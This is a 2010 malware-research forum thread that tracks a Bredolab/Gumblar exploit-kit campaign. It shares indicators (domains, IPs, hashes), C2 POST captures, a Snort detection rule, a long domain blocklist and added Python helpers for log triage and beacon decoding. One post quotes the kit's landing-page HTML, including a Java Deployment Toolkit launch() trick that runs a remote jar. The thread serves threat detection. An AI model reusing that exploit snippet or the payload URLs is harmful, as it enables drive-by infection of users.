Malware Domain List
Malware Related => Malicious Domains => Topic started by: eoin.miller on May 17, 2010, 07:21:35 pm
-
Found a few exploit kits that are all ending in .ru and running on port 8080/TCP.
188.165.61.44 - relaxedgrape.ru - 8080/TCP
Entry:
http://relaxedgrape.ru:8080/google.com/download.com/sanspo.com.php
PDF:
http://relaxedgrape.ru:8080/Notes1.pdf
http://wepawet.iseclab.org/view.php?hash=818c879f5b8bf09642cee47394ef28a4&type=js
Java:
http://relaxedgrape.ru:8080/Applet1.html
188.165.192.22 - cornerrat.ru, rarephone.ru - 8080/TCP
Entry:
http://rarephone.ru:8080/index.php?pid=7
PDF:
http://rarephone.ru:8080/Notes7.pdf
Java:
http://rarephone.ru:8080/Applet7.html
Malware/Payload:
http://cornerrat.ru:8080/welcome.php?id=6&pid=1&hello=503
174.137.179.244 - globaljoke.ru, gothguilt.ru - 8080/TCP
Malware/Payload:
http://globaljoke.ru:8080/welcome.php?id=6&pid=1&hello=503
-
188.165.192.22 - fewrocker.ru
Java:
http://fewrocker.ru:8080/Applet2.html
-
188.165.192.22 - fewrocker.ru
200 http://fewrocker.ru:8080/
403 http://fewrocker.ru:8080/i/
403 http://fewrocker.ru:8080/22/
200 http://fewrocker.ru:8080/cache/
403 http://fewrocker.ru:8080/cgi-bin/
403 http://fewrocker.ru:8080/images/
200 http://fewrocker.ru:8080/new/
200 http://fewrocker.ru:8080/22/build.exe (MD5: 39ed2b2e25883aa21ae1dde13adf7d99)
403 http://fewrocker.ru:8080/22/33/
302 http://fewrocker.ru:8080/22/cgi-bin/
302 http://fewrocker.ru:8080/22/33/cgi-bin/
200 http://fewrocker.ru:8080/new/index.php
403 http://fewrocker.ru:8080/new/include/
200 http://fewrocker.ru:8080/new/install/
403 http://fewrocker.ru:8080/new/logs/
200 http://fewrocker.ru:8080/new/install/index.php
-
Couple more, I'll keep updating the thread as I find stuff:
greatfile.ru - 85.17.19.26
valuablemind.ru - 94.75.243.6
-
Bredolab I take it phillipp?
BM Tx Edition
Src: http://fewrocker.ru:8080/new/
-
> Bredolab I take it phillipp?
> BM Tx Edition
> Src: http://fewrocker.ru:8080/new/
BManager C&C Panel
Don't know if there is a connection to Bredolab though. I'm not up-to-date at all :D
-
as far as i know BM is bredolab
-
> as far as i know BM is bredolab
I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.
http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc
-
> as far as i know BM is bredolab
> I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.
> http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc
yeah, noticed that too.
could be a non-connected file, or even a file downloaded by bredolab
-
I see the binary posting data to
http://morechord.ru/home.php
VWlkMDo6MjlERDA0QTZ+fjI5REQwNEE2YGAyOUREMDRBNg0K
which looks base64 encoded.
# morechord.ru
Domain: morechord.ru
Reg: bushy@bigmailbox.ru
IP: 217.23.7.112
RDNS:
ASN: 49981 (NL)
IP: 217.20.47.85
RDNS:
ASN: 15830 (GB)
IP: 217.11.254.41
RDNS: assigned-217-11-254-041.casablanca.cz
ASN: 15685 (CZ)
IP: 88.191.47.83
RDNS: sd-7664.dedibox.fr
ASN: 12322 (FR)
IP: 217.148.89.77
RDNS:
ASN: 16237 (NL)
-
> as far as i know BM is bredolab
> I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.
> http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc
What led me to this nest of badness was a signature that fired for bredolab from that host. One from the VRT/Sourcefire guys, the other from EmergingThreats.net; both fired on a packet from this client system.
Request:
GET /new/controller.php?action=bot&entity_list=&first=1&rnd=981633&uid=1&guid=2678185660 HTTP/1.1
Host: bayjail.ru
Signature:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPECIFIC-THREATS Bredolab downloader communication with server attempt"; flow:to_server,established; uricontent:"action="; nocase; uricontent:"entity"; nocase; uricontent:"rnd="; nocase; uricontent:"uid="; nocase; uricontent:"guid="; nocase; pcre:"/uid\x3D\d/Usmi"; pcre:"/guid\x3D\d/Usmi"; pcre:"/rnd\x3D\d/smiU"; metadata:policy balanced-ips drop, policy security-ips drop; reference:url,www.threatexpert.com/report.aspx?md5=b5a530185d35ea8305d3742e2ee5669f; classtype:trojan-activity; sid:16144; rev:2;)
I looked into what else the infected client system was connected to and then looked around for more *.ru domains that people were talking to over 8080/TCP.
EDIT:
I thought bayjail.ru was already on the MDL, I guess it isn't and should be added.
#nslookup bayjail.ru
Non-authoritative answer:
Name: bayjail.ru
Addresses: 88.191.47.83
217.11.254.41
217.20.47.85
217.23.7.112
217.148.89.77
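The hunting the post describes (the sid:16144 URI checks, plus looking for other *.ru hosts talked to over 8080/TCP) written out as a small log triage script. This is an added example, not code from the thread, Sourcefire or Emerging Threats; the proxy log format it parses is constructed for the example and the host names in the sample lines are the ones named in this thread.

```python
"""Triage helpers for the Bredolab/BM traffic discussed in this thread.

Added example. The field checks are taken from the Sourcefire rule sid:16144
quoted above (five uricontent tokens, nocase, plus three pcre checks that each
key is followed by at least one digit); the proxy log format is constructed.
"""
import re

URI_TOKENS = ("action=", "entity", "rnd=", "uid=", "guid=")
URI_PCRE = (
    re.compile(r"uid=\d", re.I),
    re.compile(r"guid=\d", re.I),
    re.compile(r"rnd=\d", re.I),
)


def matches_bredolab_uri(uri: str) -> bool:
    """True when a request URI satisfies every content and pcre check of the rule."""
    lower = uri.lower()
    if not all(tok in lower for tok in URI_TOKENS):
        return False
    return all(p.search(uri) for p in URI_PCRE)


# Constructed (hypothetical) proxy log format: ts client method host port uri status
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) "
    r"(?P<port>\d+) (?P<uri>\S+) (?P<status>\d{3})$"
)


def hunt(log_lines):
    """Return (reason, host, client) tuples for lines that match either the rule
    logic or the thread's hunting heuristic (a .ru host contacted on 8080/TCP)."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip lines that are not in the expected format
        host, port, uri, client = m["host"], int(m["port"]), m["uri"], m["client"]
        if matches_bredolab_uri(uri):
            hits.append(("sid16144-uri", host, client))
        elif host.endswith(".ru") and port == 8080:
            hits.append(("ru-8080", host, client))
    return hits


# Constructed sample log: first line reuses the request captured in the thread,
# the third is a benign request that shares some of the key names but not all.
SAMPLE_LOG = [
    "2010-05-17T18:02:11 10.0.0.25 GET bayjail.ru 8080 "
    "/new/controller.php?action=bot&entity_list=&first=1&rnd=981633&uid=1&guid=2678185660 200",
    "2010-05-17T18:02:15 10.0.0.25 GET relaxedgrape.ru 8080 /Applet1.html 200",
    "2010-05-17T18:03:40 10.0.0.31 GET www.example.com 80 /search?action=find&entity=foo&rnd=1 200",
    "2010-05-17T18:04:02 10.0.0.31 GET news.example.ru 443 /index.html 200",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

The rule logic is deliberately strict (all five tokens and all three digit checks), which is why the benign `/search?...` line with only some of the keys is not flagged; the `.ru` on 8080 heuristic is much looser and is only a pivot for further review, exactly as the post uses it.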
-
> which looks like base64 encoded.
Noticed this too. Decoded string looks like an id.
Uid0::29DD04A6~~29DD04A6``29DD04A6
-
Seen other infected hosts POSTing to foresaleonline.ru
#nslookup foresaleonline.ru
Non-authoritative answer:
Name: foresaleonline.ru
Addresses: 217.11.254.41
217.20.47.85
217.148.89.77
62.84.155.246
88.191.47.83
The POST:
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"
VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K
------------XXXXXXXXXXXXXXXXXXXXXX--
-
> Seen other infected hosts POSTing to foresaleonline.ru
> #nslookup foresaleonline.ru
> Server: krusty.eid.doi.gov
> Address: 10.10.2.3
> Non-authoritative answer:
> Name: foresaleonline.ru
> Addresses: 217.11.254.41
> 217.20.47.85
> 217.148.89.77
> 62.84.155.246
> 88.191.47.83
> The POST:
> POST /ololo.php HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
> Host: foresaleonline.ru
> Accept: text/html
> Connection: Keep-Alive
> Content-Length: 173
> Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
> ------------XXXXXXXXXXXXXXXXXXXXXX
> Content-Disposition: form-data; name="data"
> VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K
> ------------XXXXXXXXXXXXXXXXXXXXXX--
looks like an ftp stealer
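A decoder for the `data` field of these POSTs, covering both the morechord.ru beacon decoded earlier in the thread ("Decoded string looks like an id") and the foresaleonline.ru POST above. This is an added example, not code from the thread. The multipart body and the two base64 strings are copied from the posts; the field layout `Uid0::<id>~~<id>``<id>` is inferred from those two decoded samples and is an assumption about this bot's format, not a documented one.

```python
"""Decode the base64 'data' field the infected hosts POST (added example).

The two base64 samples and the multipart body come from this thread; the
beacon layout Uid<slot>::<id>~~<id>``<id> is inferred from them (assumption).
"""
import base64
import re

BEACON_RE = re.compile(
    r"^Uid(?P<slot>\d+)::(?P<a>[0-9A-F]+)~~(?P<b>[0-9A-F]+)``(?P<c>[0-9A-F]+)\s*$"
)


def decode_beacon(b64: str) -> dict:
    """Base64-decode one beacon and pull out the bot id; flags if the three
    copies of the id disagree or the payload does not match the layout."""
    raw = base64.b64decode(b64, validate=True).decode("ascii", errors="replace")
    m = BEACON_RE.match(raw)
    if not m:
        return {"raw": raw, "uid": None, "slot": None, "consistent": False}
    ids = (m["a"], m["b"], m["c"])
    return {
        "raw": raw.rstrip("\r\n"),
        "uid": ids[0],
        "slot": int(m["slot"]),
        "consistent": len(set(ids)) == 1,
    }


def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value}."""
    fields = {}
    delim = "--" + boundary
    for part in body.split(delim):
        part = part.strip("\r\n")
        if not part or part == "--":
            continue  # preamble or the closing "--" marker
        head, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]+)"', head)
        if m:
            fields[m.group(1)] = value.strip("\r\n")
    return fields


def triage_post(body: str, boundary: str) -> dict:
    """Extract and decode the 'data' field of a captured POST body."""
    return decode_beacon(parse_multipart(body, boundary)["data"])


BOUNDARY = "----------XXXXXXXXXXXXXXXXXXXXXX"
# Body of the foresaleonline.ru POST captured in the thread (CRLF endings restored).
POST_BODY = (
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="data"\r\n'
    "\r\n"
    "VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K\r\n"
    "--" + BOUNDARY + "--\r\n"
)
# The earlier morechord.ru beacon from the thread.
MORECHORD_BEACON = "VWlkMDo6MjlERDA0QTZ+fjI5REQwNEE2YGAyOUREMDRBNg0K"
# Constructed negative sample: base64 of "hello", not a beacon.
NOT_A_BEACON = "aGVsbG8="

if __name__ == "__main__":
    print(triage_post(POST_BODY, BOUNDARY))
    print(decode_beacon(MORECHORD_BEACON))
```

Both samples decode to the same shape with an 8-hex-digit id repeated three times (29DD04A6 for the morechord.ru beacon, 2EDD04A8 for the one above), which is what makes the id a usable pivot for grouping infected clients in proxy logs.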
-
I'm not sure if these domains are on the mdl, but I've seen hits on identical activity out of these domains with the associated dates if this helps the cause:
flowdisappear.ru / 82.211.7.32 (4/29)
passportblues.ru / 62.67.246.113 (5/5 + 5/12)
gigafleet.ru / 62.193.208.175 (5/6)
gothguilt.ru / 93.89.80.117 (5/13)
??? / 85.17.137.40 (5/15) # didn't capture the URL in this request, but fits the profile.
valuablemind.ru / 85.17.19.26 (5/17)
All of the requests are similar:
<html><head><title>Bob's Homepage</title></head><body><applet width='100%' height='100%' code='iPhoneBook' archive='Games.jar'><param name='site' VALUE='Njg3NDc0NzAzQTJGMkY2NzZGNzQ2ODY3NzU2OTZDNzQyRTcyNzUzQTM4MzAzODMwMkY3NzY1NkM2MzZGNkQ2NTJFNzA2ODcwM0Y2OTY0M0QzMTMxMjY3MDY5NjQzRDMxMjYzMTNEMzEyNjY0'></applet><applet code='sunny.Changes.class' archive='NewGames.jar' width='254' height='186'><param name='data' VALUE='http://gothguilt.ru:8080/welcome.php?id=9&pid=1&1=1'><param name='cc' value='1'></applet><script>
var u = "http: -J-jar -J\\\\78.26.127.127\\public\\001.jar none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch(u);
} else {
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
-
www.malc0de.com posted on Twitter a list of domains being used for that campaign.
1kinomall.ru
abr.zeytincilik.info
allturtle.ru
ashdog.ru
ashsoftware.ru
badmap.ru
bakedonion.ru
bayjail.ru
belowwatch.ru
bestfindaloan.cn
bestfinderr.cn
bigpremiumfind.cn
bigskytopguide.cn
bigtopfindsite.cn
blindbolt.ru
blueflame.ru
boldrace.ru
brilliantdad.ru
bunchguide.cn
busycloth.ru
casinoslotgamble.cn
celticradar.ru
center-kino.ru
cheap-drugshop.com
cheapfad.ru
cheapriot.ru
chokelabel.ru
clearquake.ru
combinebet.cn
cooltrack.ru
cornerrat.ru
creativeblockplay.cn
crushhead.ru
cutechair.ru
cutetrack.ru
dailyboss.ru
dating-4you.ru
dating-group.ru
dating-spot.ru
dieta-24.ru
dieta-optimal.ru
dieta-sexy.ru
dieta-tvoya.ru
dirtybody.ru
dirtysin.ru
dirtyzero.ru
dizzypizza.ru
drownpark.ru
drug-onlinestore.com
drugs-prostore.com
drugstore-menu.com
dullspa.ru
eastwombat.ru
easy-buydrugs.com
easydrugsbuy.com
energeticguy.ru
enter-pharmacyshop.com
evilpal.ru
fablips.ru
fardream.ru
fast-kino.ru
fewrocker.ru
fifthiron.ru
findbigmoneygame.cn
findbigshots.cn
findbigsoftpack.cn
findbigthinkers.cn
findyourbigidea.cn
firmwriter.ru
flowlaugh.ru
foresaleonline.ru
foundsmoke.ru
funnylead.ru
furryentry.ru
furrypipe.ru
futurevideo.ru
getdrugs-store.com
giantpremium.cn
gianttopdiscover.cn
gianttoplocate.cn
gigafleet.ru
globaljoke.ru
goodpool.ru
gothguilt.ru
greatfile.ru
gripgrate.ru
hadcorn.ru
harshdye.ru
healthy-dieta.ru
heavycloud.ru
help-vizov.ru
herpark.ru
hochutebia.ru
hostdnssite.com
hostindianet.com
hotgas.ru
hotsex-meets.ru
hugetoplocate.cn
hugetopseek.cn
icebus.ru
illmap.ru
indypages.ru
innerduck.ru
insidecan.ru
internet-drugmenu.com
ironstar.ru
juicyfile.ru
kindsunday.ru
kino-mall.ru
kino-shops.ru
labelstare.ru
lameflash.ru
lastspider.ru
latevenom.ru
lazyloss.ru
lazyrow.ru
leakymaid.ru
lessjazz.ru
lightword.ru
litetopfindworld.cn
litwire.ru
lkgjhjbh.balkansport.info
longcloud.ru
lostdeed.ru
lotbetsite.cn
lotwageronline.cn
lovemine.ru
love-pair.ru
lunchscone.ru
macroarea.ru
magic-dieta.ru
mediahousenamebuypicture.cn
megahotgirls.ru
megawomen.ru
menu-pharmacyshop.com
michaelsbestway2findalawyer.cn
micmarket.ru
microdoor.ru
mildroom.ru
miniarms.ru
ministate.ru
missgin.ru
mixbetonline.cn
mixbetworld.cn
mixwager.cn
modelprod.ru
mondaybubble.ru
mondayring.ru
morechord.ru
mushylion.ru
nearzit.ru
needtempt.ru
netwebinternet.ru
newnetnameshop.cn
noknack.ru
nosypipe.ru
nothill.ru
notkey.ru
ns1.bestservicehost.com
nudechicks.ru
oddbabe.ru
odnoklassniki-nochiu.ru
odnoklassnikinochiu.ru
oldpresident.ru
onebeard.ru
onelead.ru
onewinter.ru
online-drugshop.com
online-drugsstore.com
ourdope.ru
ourriver.ru
pangreed.ru
parkinglotbet.cn
passportblues.ru
pearlpole.ru
petlips.ru
petquestion.ru
petsample.ru
petwife.ru
pillsmartshop.com
pinkhack.ru
playslotbet.cn
politicalpoets.ru
powerbarrel.ru
powermixplay.cn
premiumlocate.cn
prickheal.ru
priorface.ru
priorsmell.ru
q0c.ru
q0l.ru
q0x.in
q0x.ru
q1f.ru
q1n.ru
q1x.ru
q3e.ru
q5x.ru
radicalgirl.ru
radjoker.ru
radtune.ru
rareelf.ru
rarephone.ru
rattyduck.ru
rawshower.ru
redspinster.ru
redwriter.ru
relaxedgrape.ru
richsign.ru
romantube.ru
roundgain.ru
roundhour.ru
roundmaker.ru
roundpad.ru
roundroad.ru
rubybrush.ru
rudeair.ru
ruralmist.ru
saltyriver.ru
saltysky.ru
scaryloss.ru
sdfasdf.vangangelt.info
secretaxe.ru
sex-army.ru
shinyrock.ru
shopmovielife.cn
shortfeet.ru
siliconemist.ru
sixthrush.ru
skepticalpub.ru
sleepydream.ru
slickfilm.ru
smallbars.ru
softstage.ru
soggyzero.ru
soreentry.ru
sos-vizov.ru
soundrisk.ru
southernpeg.ru
sparechief.ru
sparemat.ru
special-call.ru
special-message.ru
spellload.ru
spicygirls.ru
spicyledge.ru
spicyyear.ru
spotsnow.ru
springarctic.ru
srochniy-zvonok.ru
stallshare.ru
stellarshower.ru
store-drugs4u.com
stuckdate.ru
stuffstep.ru
suavepad.ru
subroyalty.ru
sunnycurse.ru
superbetsports.cn
surechip.ru
tallpen.ru
tameconcert.ru
tangystar.ru
tapclip.ru
tartshow.ru
tastysea.ru
telechart.ru
tenderavatar.ru
tenthprofit.ru
terminalpoem.ru
thebestwaytofind.cn
thecutpricegroup.cn
themixbet.cn
tightspace.ru
torncurrent.ru
tornmum.ru
ultimatecomfort.ru
urbandream.ru
usetune.ru
validbanner.ru
validfolk.ru
valuablemind.ru
vastdiary.ru
vastinsect.ru
vastobject.ru
vasttune.ru
videoroyal.ru
wantdive.ru
weakimage.ru
wearyyear.ru
westcountry.ru
westlips.ru
wetfunction.ru
wetgeek.ru
wooddemand.ru
worstfuel.ru
wovenplane.ru
wovenshelf.ru
xochu-dating.ru
yourbettas.cn
yourcombine.cn
yourmoose.ru
yoursoap.ru
yummygirls.ru
zdorovaya-diet.ru
zipbin.ru
zvonok-sos.ru
zvonok-spasatel.ru
-
it's Gumblar ;) en.wikipedia.org/wiki/Gumblar
Got them last week already, injected obfuscated script in glype proxy
gothguilt.ru.
78.32.1.70
88.165.95.133
88.165.124.185
12.19.216.11
4.23.92.35
linezing.com
19.42.227.248
jsunpack.jeek.org/dec/go?report=5b719b16905d80a41829f672915c2c56ad9aefb5
jsunpack.jeek.org/dec/go?report=c918247e34f214e96704398b6883d840fcff2473
jsunpack.jeek.org/dec/go?report=2255ccef47b208679bb47f1809127108e7c3bbd7
gothguilt.ru:8080/hsbc-co-uk/google.com/linezing.com.php
gothguilt.ru:8080/aol-co-uk/google.com/yahoo.com.cn.php
-
listed by malc0de.
http://malc0de.com/database/index.php?search=.ru%3A8080